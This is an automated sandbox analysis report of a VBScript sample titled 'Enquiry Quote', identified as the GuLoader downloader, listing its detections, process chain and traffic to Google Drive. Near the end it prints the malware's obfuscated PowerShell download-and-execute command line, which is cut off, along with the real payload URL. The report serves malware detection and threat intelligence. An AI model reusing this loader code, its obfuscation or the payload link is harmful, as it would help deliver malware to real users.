Windows Analysis Report
Enquiry Quote - 24071834-01.vbs

Overview

General Information

Sample name:	Enquiry Quote - 24071834-01.vbs
Analysis ID:	1466658
MD5:	9e2fe2b97264a9c35794d67e1c17ee26
SHA1:	3d32f6f565e50eeeba893e7734a860b7bc45a1d4
SHA256:	d692bbec767a90d323a15ef761c1a207480f417ffd1509717e1b6793c0b7299a
Tags:	vbs
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Powershell download and execute

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Obfuscated command line found

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Very long command line found

Wscript starts Powershell (via cmd or directly)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: Enquiry Quote - 24071834-01.vbs

Virustotal: Detection: 9%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.7:49707 version: TLS 1.2

Source:	Binary string: m.Core.pdb source: powershell.exe, 00000013.00000002.2559116933.000000000777F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbRZ source: powershell.exe, 00000013.00000002.2559116933.000000000771C000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: powershell.exe, 0000000F.00000002.2642359454.000001FAE72D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 0000000F.00000002.2637600894.000001FAE7063000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: wscript.exe, 00000000.00000003.1272521798.000001BBF8142000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264409533.000001BBF9FA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272148773.000001BBF9FA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267175366.000001BBF9FA5000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1264409533.000001BBF9F71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272148773.000001BBF9F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267175366.000001BBF9F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5f1628647b
Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD09E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD0A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACEC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2545333721.0000000004C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACEC01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000013.00000002.2545333721.0000000004C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.g
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.go
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.goo
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.goog
Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD09DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googl
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.c
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.co
Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD068A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACEE26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/u
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?e
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?ex
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?exp
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?expo
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?expor
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=d
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=do
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=dow
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=down
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downl
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downlo
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downloa
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&i
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8n
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3V
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3Ve
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeU
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUK
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKa
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaW
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWB
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBg
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgw
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwl
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5r
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rl
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlz
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzj
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm3
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm35
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354P
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PP
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPM
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMi
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMis
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisR
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACEE26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRUP
Source: powershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRUXR
Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download
Source: powershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD09E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD09E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.7:49707 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_3024.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3024, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5168
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 5168
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 5168	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFAAC06B4F6	15_2_00007FFAAC06B4F6
